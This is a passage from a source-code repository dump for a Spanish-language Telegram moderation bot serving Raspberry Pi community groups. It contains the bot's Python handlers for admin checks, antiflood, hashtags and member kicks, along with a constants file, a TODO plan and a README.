En público no funcionan los comandos de Admin\n if chat_id not in GROUPS_ID.values():\n # Si el usuario no es admin, registramos el intento, le respondemos que no puede y anulamos\n if user_id not in ADMINS:\n logger.info(\"Intento de ejecución de un comando privilegiado por el Usuario: {}.\".format(user_id))\n update.message.reply_text(\"Lo siento, no tienes permiso para ejecutar este comando.\")\n return\n # Si sí que es admin, entonces la ejecutamos\n return func(bot, update, *args, **kwargs)\n # Si lo intenta ejecutar en el grupo, no lo permitimos.\n else:\n return\n\n return wrapped\n\n\n# Decorador para comprobar si un comando se ha ejecutado repetidamente para no permitirlo (AntiFlood)\ndef antiflood(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n name_func = func.__name__\n # Si se ejecuta desde el grupo comprobaremos el flood\n if chat_id in GROUPS_ID.values():\n funciones_times = read_json(ANTIFLOOD_FILE)\n # Si el fichero existe y no está vacío y el canal existe\n if funciones_times and str(chat_id) in funciones_times:\n # Si la función ya está registrada en el fichero\n if name_func in funciones_times[str(chat_id)]:\n # Si la función ha sido ejecutada en los últimos minutos, no ejecutamos la función\n hora = datetime.datetime.strptime(funciones_times[str(chat_id)][name_func], \"%d-%m-%Y %H:%M\")\n if hora > datetime.datetime.now() - datetime.timedelta(minutes=ANTIFLOOD_MINUTES):\n return\n # Si aún no se ha registrado el canal, lo registramos\n else:\n funciones_times[str(chat_id)] = {}\n # Y registramos la función ejecutada y la hora\n funciones_times[str(chat_id)][name_func] = datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")\n graba_json(ANTIFLOOD, ANTIFLOOD_FILE, funciones_times)\n return func(bot, update, *args, **kwargs)\n # Si se envía desde privado, la ejecutamos siempre. Si se quiere hacer flood a si mismo... :-p\n else:\n return func(bot, update, *args, **kwargs)\n\n return wrapped\n\n\n# Función para comprobar si la impresión de un hashtag es muy repetida en tiempo (Antiflood)\ndef antiflood_tags(chat_id, tag):\n # Si la ejecución del trag se hace en los grupos\n if chat_id in GROUPS_ID.values():\n tag_times = read_json(ANTIFLOOD_TAG_FILE)\n # Si el fichero existe y no está vacío y el canal existe\n if tag_times and str(chat_id) in tag_times:\n # Si el tag ya está registrado en el fichero\n if tag in tag_times[str(chat_id)]:\n # Si el tag ha sido ejecutada en los últimos minutos, no ejecutamos la impresión\n hora = datetime.datetime.strptime(tag_times[str(chat_id)][tag], \"%d-%m-%Y %H:%M\")\n if hora > datetime.datetime.now() - datetime.timedelta(minutes=ANTIFLOOD_MINUTES):\n return False\n # Si ese tag o grupo aún no estaba registrado, lo registramos\n else:\n tag_times[str(chat_id)] = {}\n # Grabamos la hora de ejecución del tag correspondiente\n tag_times[str(chat_id)][tag] = datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")\n graba_json(ANTIFLOOD_TAG, ANTIFLOOD_TAG_FILE, tag_times)\n return True\n # Si se envía desde privado, la ejecutamos siempre. Si se quiere hacer flood a si mismo... :-p\n else:\n return True\n\n\n# Función de ayuda. 
Aquí iremos poniendo todos los comandos y opciones de los que vayamos dotando al bot.\n# Intenta enviarla por privado, si no puede, la envía al grupo con enlace al bot + AntiFlood\n@antiflood\ndef bot_help(bot, update):\n # Obtenemos el ID del chat desde donde nos hablan...\n chat_id = update.message.chat_id\n # Y el privado del usuario\n user_id = update.message.from_user.id\n # Intentamos enviarle la ayuda por privado...\n try:\n bot.send_message(chat_id=user_id, text=\"\"\"\nℹ️ COMANDOS Y FUNCIONES DISPONIBLES ℹ️\n\n▪️/canales\nMuestra la relación de canales de Raspito's Family\n▪️ /normas\nMuestra las reglas comunes a los canales de Raspito's Family\n▪️/tags\nMuestra la relación de tags con información disponibles\n\"\"\")\n # Si el usuario es un Admin, le mandamos la extensión de ayuda a administradores\n if user_id in ADMINS:\n bot.send_message(chat_id=user_id, text=\"🔐 ***ADMIN DETECTED***‼\\n\"\n \"Como admin, tienes derecho a añadir, editar y borrar tags.\\n\"\n \"Envía /tags para obtener más ayuda sobre cómo hacerlo.\",\n parse_mode=ParseMode.MARKDOWN)\n # Si no hemos podido enviarlo por privado...\n except:\n update.message.reply_text(\"Para acceder a la ayuda, pincha en <a href='http://t.me/RaspythonBot'>\"\n \"ESTE ENLACE</a> e iníciame...\",\n parse_mode=ParseMode.HTML)\n\n\n# Función de arranque del Bot. Será lo que se muestre cuando un usuario inicie el Bot en privado.\ndef start(bot, update):\n # Obtenemos el ID del chat desde donde nos hablan...\n chat_id = update.message.chat_id\n # La ayuda sólo la mostraremos si se ejecuta en privado. Si se hace en uno de los canales la ignoraremos.\n if chat_id not in GROUPS_ID.values():\n update.message.reply_text(\"🤖 Bienvenido al RaspythonBot 🤖\\n\"\n \"Bot creado y pensado para dar soporte al grupo @Raspython\\n\"\n \"t.me/Raspython\\n\"\n \"Pulsa /help para obtener ayuda sobre lo que puedes hacer\")\n\n\n# Función que muestra la relación de canales de la Raspito's Family\n@antiflood\ndef canales(bot, update):\n # Enviamos la lista de canales de la Raspito's Family con control Antiflood\n update.message.reply_text(\"🔸 Relación de los canales de la Raspito's Family 👨👩👧👦\\n\\n\"\n \"▫️@GrupoRaspberryPI\\n\"\n \"Canal precursor de la Raspito's Family. Dialoga sobre los aspectos generales \"\n \"sobre la Raspberry PI, como donde comprarla, que accesorios son recomendables, \"\n \"dudas sobre configuración, etc. En definitiva, todo lo relacionado sobre nuestras \"\n \"PI que no abarquen más específicamente el resto de canales de la familia.\\n\\n\"\n \"▫️@RaspberryPiMediacenters\\n\"\n \"Canal enfocado al uso y disfrute de nuestras Raspberry Pi como centro multimedia.\\n\\n\"\n \"▫ @RaspberryPiEmuladores\\n\"\n \"Canal dedicado a la temática sobre emulación en nuestras Raspberry Pi. Configura tu \"\n \"pequeña Pi como un centro de juego arcade. Disfruta con la emulación!.\\n\\n\"\n \"▫ @Raspython\\n\"\n \"Grupo para debatir, dialogar y preguntar sobre todo lo relacionado con la programación \"\n \"en Python y Raspberry. Este Bot es precisamente un proyecto desarrollado en este canal. \"\n \"Únete y disfruta.\\n\\n▫ @RaspberryPiOfftopic\\n\"\n \"¿Te apetece hablar con los compañeros de la Raspito's family sobre cualquier otro \"\n \"tema?, pues este es tu canal. Entra charla, comparte y disfruta con el resto de \"\n \"compañeros sin límite de temática. 
(Contenido sexual explícito, violento y de temáticas \"\n \"similares está prohibido)\")\n\n\n# Función que tiene como objeto mostrar las reglas del grupo\n@antiflood\ndef normas(bot, update):\n # Enviamos las reglas del grupo con control Antiflood\n update.message.reply_text(\"📜 Las reglas de este grupo son muy sencillas...\\n\\n\"\n \"⛔️Nada de sexo explícito, ni política, ni religión, ni nada no relacionado \"\n \"con la temática del canal.\\n\"\n \"🚫 Tampoco están permitidos los enlaces a otros grupos o páginas webs que cumplan \"\n \"los criterios anteriormente descritos.\\n\"\n \"❓ En caso de dudas, consultar con cualquier administrador del grupo.\\n\\n\"\n \"🤙🏼 Como último requisito, pasarlo bien, disfrutar, compartir y que fluya el buen rollo\")\n\n\n# En esta función trataremos los comandos no reconocidos. De momento lo dejamos en \"pass\" para ignorarlos\ndef comando_invalido(bot, update):\n pass\n\n\n# Función en la que filtraremos los datos enviados por el usuario y que trataremos según corresponda\n# De momento sólo responde a un pequeño easteregg en honor a \"Raspito\". Tiene control de flood\n@run_async\ndef trata_texto(bot, update):\n chat_id = update.message.chat_id\n # user_id = update.message.from_user.id\n\n # Si se está hablando desde uno de los canales del grupo, pasamos el antiflood\n if chat_id in GROUPS_ID.values():\n msg_antiflood(bot, update)\n\n texto = update.message.text\n\n if re.search(r\"(?i)qu[eé] es raspito\\b\", texto):\n update.message.reply_text(\"...son los padres\")\n\n\ndef msg_antiflood(bot, update):\n chat_id = update.message.chat_id\n user_id = str(update.message.from_user.id)\n name = update.message.from_user.name\n message_id = update.message.message_id\n time = datetime.datetime.now()\n user_time = None\n\n # El diccionario flood time tendrá la siguiente estructura:\n # ID de usuario : [ Hora de último bloque, Contador mensajes, Warnings, Advertido ]\n flood_tab = read_json(MSG_AFLOOD_FILE)\n\n # Si ha habido error en lectura\n if flood_tab is None:\n logger.info(\"Error en la lectura del fichero de Aflood de mensajes\")\n return\n\n # Si el usuario ya está registrado\n if user_id in flood_tab:\n # Convertimos la hora:\n user_time = datetime.datetime.strptime(flood_tab[user_id][0], \"%d-%m-%Y %H:%M:%S\")\n # Comprobamos la hora de su último bloque de mensajes\n if user_time > time - datetime.timedelta(seconds=AFLOOD_TIME):\n # Si entra dentro del rango de flood, le sumamos uno al contador de mensajes\n flood_tab[user_id][1] += 1\n elif user_time < time + datetime.timedelta(hours=24):\n # Si no, y no han pasado 24 h. le registramos el nuevo bloque de mensajes manteniendo\n # los warning ya existentes\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, flood_tab[user_id][2],\n flood_tab[user_id][3]]\n else:\n # Si han pasado más de 24 horas, le bajamos un grado de nivel de warning\n if flood_tab[user_id][2] >= 2:\n warnings = 1\n else:\n warnings = 0\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, warnings, 0]\n else:\n # Si el usuario no existe, pasamos a registrarlo\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, 0, 0]\n\n # Si ha pasado el tiempo de castigo de borrado de mensajes, le bajamos un nivel. 
A la próxima fuera!\n if flood_tab[user_id][2] == 2 and user_time + datetime.timedelta(minutes=AFLOOD_MINUTES_DEL) < time:\n flood_tab[user_id][2] = flood_tab[user_id][2] - 1\n\n # Ahora comprobamos cómo está el usuario respecto a contadores y warnings\n # Si el contador es igual o mayor que el número máximo de mensajes, aumentamos warnings\n if flood_tab[user_id][1] >= AFLOOD_MSGS:\n # Si ya ha sido advertido alguna vez del nivel 2:\n if flood_tab[user_id][3]:\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 0, 3, flood_tab[user_id][3]]\n else:\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 0,\n flood_tab[user_id][2] + 1, flood_tab[user_id][3]]\n\n # Y ahora hacemos según tenga el warning\n # Si es el primer warning\n if flood_tab[user_id][2] == 1 and flood_tab[user_id][1] == 0:\n update.message.reply_text(\"⚠️***PRIMERA ADVERTENCIA*** ⚠️\\nEl flood no está permitido. \"\n \"No puedes enviar más de {} mensajes en {} segundos\"\n .format(AFLOOD_MSGS, AFLOOD_TIME), parse_mode=ParseMode.MARKDOWN)\n elif flood_tab[user_id][2] == 2 and flood_tab[user_id][1] == 0:\n # Si ya es la segunda vez que está en este nivel en 24h, a la calle\n update.message.reply_text(\"⛔️***SEGUNDA ADVERTENCIA***‼️\\nEl flood no está permitido. \"\n \"Los mensajes que envíe durante los próximos {} minutos serán, eliminados.\\n‼️\"\n \"***No hay más advertencias, a la siguiente, FUERA***‼️\"\n .format(AFLOOD_MSGS, AFLOOD_MINUTES_DEL), parse_mode=ParseMode.MARKDOWN)\n flood_tab[user_id][3] += 1\n elif flood_tab[user_id][2] >= 2:\n # Si ya estamos a nivel warning 2, le borramos el mensaje\n del_right = bot.delete_message(chat_id=chat_id, message_id=message_id)\n if not del_right:\n logger.info(\"Problema al borrar el mensaje {} del usuario {}\".format(message_id, user_id))\n\n # Si alcanza warning 3, o es la segunda vez que alcanza warning 2, a la calle!\n if flood_tab[user_id][2] > 2 or flood_tab[user_id][2] == 2 and flood_tab[user_id][3] > 1:\n bot.send_message(chat_id=chat_id, text=\"EL USUARIO {}{} HA SIDO EXPULSADO POR FLOOD CONTINUO\"\n .format(user_id, name))\n bot.send_message(chat_id=209200079, text=\"EL USUARIO {}{} HA SIDO EXPULSADO POR FLOOD CONTINUO\"\n .format(user_id, name))\n bot.kick_chat_member(chat_id=chat_id, user_id=user_id)\n\n graba_json(MSG_FLOOD, MSG_AFLOOD_FILE, flood_tab)\n\n\n# Función en la que tratamos los hashtags de los mensajes\n@run_async\ndef parsing_hashtag(bot, update):\n chat_id = update.message.chat_id\n # user_id = update.message.from_user.id\n hashtags = update.message.parse_entities('hashtag')\n # Pasamos los hashtags a minúsculas y eliminamos duplicados\n hashtags = set([x.lower() for x in list(hashtags.values())])\n # Leemos la relación de tags de nuestro fichero\n # Ahora mismo sólo soportamos un HASHTAG_FILE, pero lo suyo es tener tantos HASHTAG_FILE como canales diferentes\n # para que cada grupo pueda administrar sus propios tags. Eso obliga a cambiar las funciones de creación de tags.\n bot_tags = read_json(HASHTAG_FILE)\n # Si no a habido problemas y tenemos tags en el fichero, los procesamos\n if bot_tags:\n for h in sorted(hashtags):\n if h in bot_tags:\n if antiflood_tags(chat_id, h):\n update.message.reply_text(\"***#{}***\\n{}\".format(h[1:].capitalize(), bot_tags[h]),\n parse_mode=ParseMode.MARKDOWN, quote=False,\n disable_web_page_preview=True)\n\n\n# Función que abre el JSON de los Hashtag y devuelve su contenido. 
En caso de error devolvemos nulo.\ndef read_json(file):\n # Si el fichero no existe, devolvemos un diccionario vacío\n if not os.path.isfile(file):\n return {}\n # Intentamos abrirlo y retornamos el contenido\n try:\n with open(file, \"r\") as f:\n return json.load(f)\n # Si no podemos, retornamos nulo\n except:\n return None\n\n\n# Función para añadir tags al fichero\ndef editing_tags(bot, update):\n # Separamos los comandos\n comando = update.message.text_markdown\n chat_id = update.message.chat_id\n # Si sólo ha mandado el comando, mostramos la ayuda\n if not len(comando.split()) == 1:\n # Si el comando es el de \"añadir\"\n if comando.split()[1].lower() == \"add\":\n # Si faltan parámetros\n if len(comando.split()) < 3 or not len(comando.split(\"@@\")) == 2:\n tagtoadd = \"\"\n else:\n # Separamos tag del texto\n tagtoadd = \" \".join(comando.split()[2:]).split(\"@@\")\n\n # Si no lo ha mandado correctamente formateado\n if not len(tagtoadd) == 2 or not len(tagtoadd[0].split()) == 1:\n update.message.reply_text(\"⚠️ Recuerda, `/tags add #etiqueta@@texto`\\n\\n\",\n parse_mode=ParseMode.MARKDOWN)\n return\n\n # Separamos tag del texto\n tag = comando.split(\"@@\")[0].split()[2]\n text = comando.split(\"@@\")[1]\n # Comprobamos que es un tag\n if tag[0] == \"#\":\n # grabamos(tag,texto)\n if graba_tag(tag.lower(), text):\n update.message.reply_text(\"Actualización de hastags correcta 👍🏼\")\n return\n else:\n update.message.reply_text(\"❌ Problema en la grabación de los hashtags\")\n logger.info(\"Problema en la grabación de los hashtags en editing_tags\")\n return\n else:\n update.message.reply_text(\"⚠️No has enviado un hashtag. Te faltó la #\")\n return\n elif comando.split()[1].lower() == \"list\" and len(comando.split()) == 2:\n print_list(bot, update)\n return\n\n elif comando.split()[1].lower() == \"del\" and len(comando.split()) == 3:\n tag = comando.split()[2]\n if tag[0] == \"#\":\n keyboard = [[InlineKeyboardButton(\"Si\", callback_data='Si_delete'),\n InlineKeyboardButton(\"No\", callback_data='No_delete')]]\n reply_markup = InlineKeyboardMarkup(keyboard)\n bot.send_message(chat_id=chat_id, text='¿Quieres eliminar el tag {}?:'\n .format(tag), reply_markup=reply_markup)\n else:\n update.message.reply_text(\"⚠️No has enviado un hashtag. 
Te faltó la #\")\n return\n\n # Si hemos llegado aquí, es que el comando estaba mal formado.\n update.message.reply_text(\"📌 El uso de /tags es el siguiente:\\n\\n\"\n \"▫️Para añadir o editar un hashtag existente usa:\\n`/tags add #etiqueta@@texto`\\n\"\n \"▫ Para eliminar un hashtag usa:\\n`/tags del #etiqueta`\\n\"\n \"▫ Para listar los hashtag establecidos usa:\\n`/tags list`\\n\",\n parse_mode=ParseMode.MARKDOWN)\n return\n\n\n# Función que realiza la grabación del JSON con control asíncrono\n# Recibe en tipo la variable del semáforo, el fichero y los datos a guardar\ndef graba_json(tipo, file, datos):\n # Solicitamos permiso al semáforo\n switch_semaforo(START, tipo)\n try:\n with open(file, \"w\") as f:\n json.dump(datos, f)\n # Liberamos el semáforo\n switch_semaforo(END, tipo)\n return True\n except:\n logger.info(\"Error de grabación al grabar {}.\".format(file))\n # Liberamos el semáforo\n switch_semaforo(END, tipo)\n return False\n\n\n# Función que realiza la grabación del JSON de los tags con control asíncrono\n# Recibo el tag a guardar y el texto del mismo\ndef graba_tag(tag, texto):\n # Solicitamos permiso al semáforo\n switch_semaforo(START, HASHTAG)\n # Leemos las tags del fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Comprobamos si la lectura ha tenido éxito\n if bot_tags is None:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return False\n # Actualizamos o creamos el tag con el texto\n bot_tags[tag] = texto\n try:\n with open(HASHTAG_FILE, \"w\") as f:\n json.dump(bot_tags, f)\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return True\n except:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return False\n\n\n# Función que recorre el fichero de tags y los manda formateados en columnas\n@antiflood\n@run_async\ndef list_tags(bot, update):\n # Si lo manda uno de los admins por privado\n if update.message.chat_id in ADMINS:\n # Le mando a la función avanzada\n editing_tags(bot, update)\n else:\n print_list(bot, update)\n\n\ndef print_list(bot, update):\n # Leemos la relación de tags de nuestro fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Si no a habido problemas y tenemos tags en el fichero, los procesamos\n if bot_tags:\n update.message.reply_text(\"👇🏼 A continuación la relación de tags registrados 👇🏼\", quote=False)\n i = 0\n tag_text = \"\"\n for h in sorted(bot_tags):\n i += 1\n tag_text += \"#️⃣\" + \" \" + \"`\" + h[1:].upper() + \"`\" + \"\\n\"\n if i > 20:\n update.message.reply_text(tag_text, parse_mode=ParseMode.MARKDOWN, quote=False)\n i = 0\n tag_text = \"\"\n if i:\n update.message.reply_text(tag_text, parse_mode=ParseMode.MARKDOWN, quote=False)\n else:\n update.message.reply_text(\"😣 Actualmente no hay tags registrados\")\n\n\ndef delete_tag(bot, update):\n query = update.callback_query\n tag = \"#\" + update.callback_query.message.text.split(\"#\")[1][:-2]\n if query.data in \"Si_delete\":\n # Solicitamos permiso al semáforo\n switch_semaforo(START, HASHTAG)\n # Leemos las tags del fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Comprobamos si la lectura ha tenido éxito\n if bot_tags is None:\n logger.info(\"Error de lectura del hashtagfile en delete_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"❌ Problema de lectura del fichero hashtagfile al borrar el tag\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n 
return\n\n # Buscamos primero el tag, y si no está, retornamos error\n if tag.lower() not in bot_tags:\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"⚠ El tag no se encuentra en la lista. Abortamos...\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n\n # Si está, entonces lo borramos\n del bot_tags[tag]\n # Y grabamos\n try:\n with open(HASHTAG_FILE, \"w\") as f:\n json.dump(bot_tags, f)\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"♻️El tag ha sido eliminado correctamente de la lista! 🗑\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n except:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"❌ Problema al guardar el fichero hashtagfile al borrar el tag\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n else:\n bot.edit_message_text(text=\"✋🏼 Anulado el borrado del tag... ✋🏼\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n\n\ndef bienvenida(bot, update):\n chat_id = update.message.chat_id\n if chat_id == GROUPS_ID[\"Raspython\"]:\n update.message.reply_text(\"Bienvenido al grupo de Raspython... DISFRUTA Y PARTICIPA! 👋🏼\\n\"\n \"Ábreme un privado <a href='http://t.me/RaspythonBot'>\"\n \"PINCHANDO AQUÍ</a> e iníciame para obtener información...\",\n parse_mode=ParseMode.HTML)\n\n\ndef idchannel(bot, update):\n chat_id = update.message.chat_id\n user_id = update.message.from_user.id\n name = update.message.from_user.name\n update.message.reply_text(\"{}, tienes el UserID: {} y me escribes desde {}\".format(name, user_id, chat_id))\n\n\ndef main():\n # Inicializamos nuestro bot\n raspython_bot = Updater(token=TOKEN)\n # Generamos el dispatcher para recoger los comandos y textos del chat\n dispatcher = raspython_bot.dispatcher\n\n # Definición de los comandos\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", bot_help))\n dispatcher.add_handler(CommandHandler(\"canales\", canales))\n dispatcher.add_handler(CommandHandler(\"normas\", normas))\n dispatcher.add_handler(CommandHandler(\"tags\", list_tags))\n dispatcher.add_handler(CommandHandler(\"idchannel\", idchannel))\n\n # Capturador de nuevos miembros\n dispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, bienvenida))\n\n # Capturador de comandos no reconocidos\n dispatcher.add_handler(MessageHandler(Filters.command, comando_invalido))\n\n # Capturador de textos. Capturaremos aquello que no sean comandos explícitos\n # Cuando contienen hashtags\n dispatcher.add_handler(MessageHandler(Filters.entity(MessageEntity.HASHTAG), parsing_hashtag))\n # Cuando es texto\n dispatcher.add_handler(MessageHandler(Filters.text, trata_texto))\n\n # Capturador del menú de borrado de tags (Si y No)\n raspython_bot.dispatcher.add_handler(CallbackQueryHandler(delete_tag, pattern=\"Si_delete|No_delete\"))\n\n # Arrancamos el bot, empezamos a capturar peticiones\n # Con clean ignoramos los mensajes pendientes...\n raspython_bot.start_polling(clean=True)\n # Y lo dejamos esperando\n raspython_bot.idle()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6626865863800049,
"alphanum_fraction": 0.7186567187309265,
"avg_line_length": 29.85714340209961,
"blob_id": "a3a1aeede7fcab9d14a21b1e7840f9e03da56226",
"content_id": "02c01dedc4591895712f5d9316c6a3882608a3e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 42,
"path": "/constantes.py",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "# TOKEN de nuestro bot. Es entregado por BotFather.\r\nTOKEN = \"<PONER AQUI EL TOKEN DE VUESTRO BOT>\"\r\n\r\n# Relación de los Chat_ID de los grupos de la Raspito's Family\r\nGROUPS_ID = {\r\n \"Raspython\": -1001122218457,\r\n \"General\": -1001027822398,\r\n \"Mediacenters\": -1001088073949,\r\n \"Emuladores\": -1001081864192,\r\n \"Off-topic\": -1001051912425,\r\n}\r\n\r\n# Tiempo para el antiflood\r\nANTIFLOOD_MINUTES = 15\r\n\r\n# Tiempos y mensajes para el antiflood de mensajes por usuario\r\n# En segundos (Mensajes por segundo)\r\nAFLOOD_TIME = 40\r\nAFLOOD_MSGS = 5\r\n# Minutos de castigo de borrado de mensajes\r\nAFLOOD_MINUTES_DEL = 5\r\n\r\n# Relación de los User_ID de las personas autorizadas a hacer tareas restringidas en el Bot. (AkA moderadores)\r\nADMINS = [<PONER LOS ID DE LOS ADMINS AQUI SEPARADOS POR COMAS>]\r\n\r\n# Ubiación del fichero de Log de nuestro Bot. Importante que el usuario con el que se corra el bot tenga derechos de\r\n# escritura sobre dicho fichero.\r\nLOG_FILE = \"RaspythonBot.log\"\r\n\r\n# Ubicación del fichero de hashtags\r\nHASHTAG_FILE = \"databases/hashtags.json\"\r\nANTIFLOOD_FILE = \"databases/antiflood.json\"\r\nANTIFLOOD_TAG_FILE = \"databases/antiflood_tag.json\"\r\nMSG_AFLOOD_FILE = \"databases/antiflood_msg.json\"\r\n\r\n# Constantes para semáforo:\r\nSTART = True\r\nEND = False\r\nHASHTAG = 1\r\nANTIFLOOD = 2\r\nANTIFLOOD_TAG = 3\r\nMSG_FLOOD = 4\r\n\r\n"
},
{
"alpha_fraction": 0.7323014140129089,
"alphanum_fraction": 0.7373093366622925,
"avg_line_length": 42.91999816894531,
"blob_id": "16062367e1567290cd41bebde33eef407bfd2e2c",
"content_id": "e450cfd350ab489b3f251364fa63feee0da760c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 4462,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 100,
"path": "/TODO.txt",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "\t\t==> RASPYTHON-BOT <==\n\nRaspython bot pretende ser un bot de moderación creado por y para el grupo\nde Telegram @Raspython.\n\n==========================================================================\n(2017:)\n* Requisitos iniciales - 25 de junio\n* Adición del esqueleto del bot y las primeras funciones - 26 de junio\n* Creada sección de opciones ya implementadas al pie de este documento - 28 de junio\n[Reunión del 29 de junio]\n* Se acuerdan las siguientes condiciones para el antiflood:\n-> Más de 4 mensajes en 10 segundos:\n\t1º) Advertencia\n\t2º) Borrado de mensajes\n\t3º) Kick/Ban\n\n\n- Que sea capaz de enviar conversaciones que se salgan de la temática del\ngrupo a el resto de grupos de la familia Raspito, siguiendo las siguientes\nnormas:\n\nPalabra clave:\t\t\tCanal:\n#general\t\t\t@GrupoRaspberryPi\n(Si alguien hace una pregunta genérica sobre la pi, como por ejemplo que\ncaja comprar, que ventilador adquiri, etc., le mandaremos con el tag\n#general al grupo genérico de Raspberry)\n\n#mediacenters\t\t\t@RaspberryPiMediacenters\n(Si alguien hace una pregnta sobre el uso de las pi como mediacenter o\nsimilares, con el tag #mediacenters le mandaremos al grupo correspondiente)\n\n#emuladores\t\t\t@RaspberryPiEmuladores\n(Siguiendo la filosofía anterior, si alguien pregunta sobre emuladores,\narcades y demás, usaremos el tag #emuladores para enviarlo para dicho grupo)\n\n#off-topic\t\t\t@RaspberryPiOfftopic\n(Para todo lo demás, les enviaremos al grupo off-topic)\n\n- Sistema de advertencias. Los usuarios podrán enviar reportes a otros\nusuarios, y si este recibe más de x (decidiremos este \"x\"), dicho usuario\nserá expulsado del grupo por el bot.\nTambién los usuarios podrán, de la misma forma, quitar los reportes.\n\n- Que el bot detecte flood y advierta al usuario si realiza un flood\nsuperior a x en un tiempo determinado...\n\n- Un sistema de puntuación de usuarios, que cuando a alguien le guste algo \nque ha dicho otra persona o le haya ayudado, pueda darle un \"like\" a algún\nmensaje. El bot llevará la cuenta de likes y cuando se le haya dado un\ncierto número mínimo de likes al mensaje en cuestión (por ejemplo, 10), se\nle aumentará en una decima la reputación a dicho usuario. Y evidentemente un\ncomando para consultar el like de cierta persona. Creo que si llega a calar,\nno solo serviría para saber cuanto ayuda alguien, si no también motivaría\nmucho a la peña para que intenten ayudar.\n\n- Un comando de mensaje de cuenta atrás: que al mensaje que se escriba a\ncontinuación se mantenga un cierto tiempo (es decir, un mensaje con\ncaducidad) y pasado ese tiempo el bot se encargue de eliminarlo.\nPara mensajes que son solo informativos, tipo claves de raspito, k sabes k\npasadas 24 horas ya estarán cogidas y no tiene sentido que se quede escrito\nen el grupo ese mensaje.\n\n- Un comando de mensaje futuro: que se pueda preparar un mensaje para una \nfecha/tiempo posterior, y llegado ese momento el bot genere dicho mensaje.\n\n- Cuando alguien mande un link, añadir un sistema de me gusta no me gusta, y\nsi llega a x negativos, se borra el mensaje.\n\n- Algún easteregg (con control de flood)\n\n\n=======================================================================================\n=======================================================================================\nYA IMPLEMENTADO:\n- Que sea capaz de mostrar una reglas del grupo. 
Se ha decidido dejar como\nestático, porque no es una cosa que cambie muy amenudo como para que merezca\nel exfuerzo de hacerlo editable en vivo.\n\"\"\"\n📜 Las reglas de este grupo son muy sencillas...\n\n⛔️Nada de sexo explícito, ni política, ni religión, ni nada no relacionado con la temática del canal.\n🚫 Tampoco están permitidos los enlaces a otros grupos o páginas webs que cumplan los criterios anteriormente descritos.\n❓ En caso de dudas, consultar con cualquier administrador del grupo.\n\n🤙🏼 Como último requisito, pasarlo bien, disfrutar, compartir y que fluya el buen rollo\n\"\"\"\n\n- Bienvenida. Que el bot de la bienvenida a todo nuevo usuario y le envíe\nla información básica del grupo.\n\n- Que sea capaz de memorizar tags que los moderadores podrán crear en\nprivado, con documentación que se considere de interés con una serie de\nlanzadores. Por ejemplo #libros, y que el bot devuelva una lista de libros\ninteresantes sobre python.\n\n- Implementar un decorador antiflood\n\n- La ayuda que la envíe a privado, y si no puede, que muestre el mensaje de\nque lo pregunte por privado"
},
{
"alpha_fraction": 0.7792642116546631,
"alphanum_fraction": 0.7892976403236389,
"avg_line_length": 36.375,
"blob_id": "2b7ad0057b7e313c0d1323dcf123518b2135408c",
"content_id": "0fdb378408734113c560660d4e3b8eae4832fd14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 16,
"path": "/README.md",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "# Raspython-Bot\nBot de moderación para el grupo Raspython\n\nLa Raspito's Family tiene un nuevo miembro en Telegram. En este caso, se\ntrata de un grupo dedicado a la programación en Python orientada a Raspberry\nPi. El grupo lo tenéis en el siguiente enlace...\nhttps://t.me/Raspython\n\nPues bien, nuestro primer proyecto será crear un Bot moderador que realice\ntareas automáticas para el mantenimiento del grupo.\n\nPara recopilar toda la información, hemos creado un hilo en el foro de\nraspberry... El link es el siguiente:\nhttps://www.fororaspberry.es/viewtopic.php?f=40&t=6211\n\nANÍMATE Y PARTICIPA!!!\n"
}
] | 4 |
TableauServerbyPackt/TableauSDKAndAPI
|
https://github.com/TableauServerbyPackt/TableauSDKAndAPI
|
dd3aac7f6f0aa75d3768a0050edc989b7f9ecc42
|
27e0052fc4886e45a9fe4f3882b703afc3789eb5
|
